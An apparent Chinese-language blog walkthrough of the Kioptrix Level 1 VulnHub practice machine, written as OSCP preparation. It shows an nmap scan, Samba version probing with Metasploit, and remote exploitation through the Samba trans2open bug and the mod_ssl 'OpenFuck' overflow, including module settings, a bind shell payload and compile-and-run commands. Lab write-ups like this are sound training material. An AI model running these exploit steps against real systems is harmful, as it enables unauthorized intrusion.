同步发布:https://www.youi.xin/?p=435
类OSCP靶机-Kioptix Level 1
- 官方下载地址:Kioptrix: Level 1 (#1): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
- 百度云下载地址:链接:https://pan.baidu.com/s/1aYc6P2aqPCL4jY1H-G6Z1w
提取码:youi
vulnhub简介
1.环境部署
安装vmware并直接文件->打开即可
1.可能遇到的问题-网卡无法连接
需要修改 Kioptix Level 1.vmx文件,将ethernet0.networkName的值改为Nat
ethernet0.networkName = "Nat"
重启即可。
2.信息收集
首先使用nmap对网络进行扫描发现主机
发现可疑目标主机192.168.29.131,进行端口扫描,结果如下
root@cheney:~# nmap -sV -A -p 1-65535 192.168.29.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 22:34 CST
Nmap scan report for 192.168.29.131
Host is up (0.0013s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-07-28T14:37:39+00:00; +1m50s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:3D:4C:29 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 1m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 1.32 ms 192.168.29.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.04 seconds
在80端口的web中发现一个mrtg http://192.168.29.131/mrtg/index.html 全流量监控 但未搜索到可利用的漏洞
在139端口运行Samba服务,但是nmap并没有扫描出端口。我们需要想办法进行版本探测
Metasploit有一个smb版本扫描模块,但是真实考试Metasploit只能使用一次(之后的操作也会尽量避开Metasploit)。在此只是介绍如何使用。
利用Metasploit扫描smb版本信息
启动msfconsole,搜索smb_version
search smb_version
执行以下命令
use auxiliary/scanner/smb/smb_version
set rhosts [靶机IP] //例如 set rhosts 192.168.29.131
set THREADS 10 //设置线程
run
3.漏洞利用-samba trans2open
非Metasploit版
得到版本信息去搜索漏洞
searchsploit samba linux 2.2
还可以到 https://www.exploit-db.com 搜索攻击脚本
samba存在一个著名的trans2open漏洞,利用该关键字搜索并下载攻击exp,下载链接: https://www.exploit-db.com/download/22469
编译并运行,攻击成功。
Metasploit版
搜索漏洞攻击脚本:
search trans2open
漏洞攻击
use exploit/linux/samba/trans2open
set rhosts 192.168.29.131
set payload linux/x86/shell/bind_tcp
攻击前查看配置
run 发射exp进行攻击,获得权限
4.漏洞利用-apache mod_ssl
选择Apache mod_ssl < 2.8.7 OpenSSL - ‘OpenFuckV2.c’ Remote Buffer Overflow (2) | exploits/unix/remote/47080.c 来进行攻击
编译脚本:
gcc 47080.c -o ssl_mod -lcrypto
./ssl_mod 0x6b 192.168.29.131 443 -c 40
可能遇到的问题
编译时报错:
解决方法:kali下可直接安装libssl-dev
apt-get install libssl-dev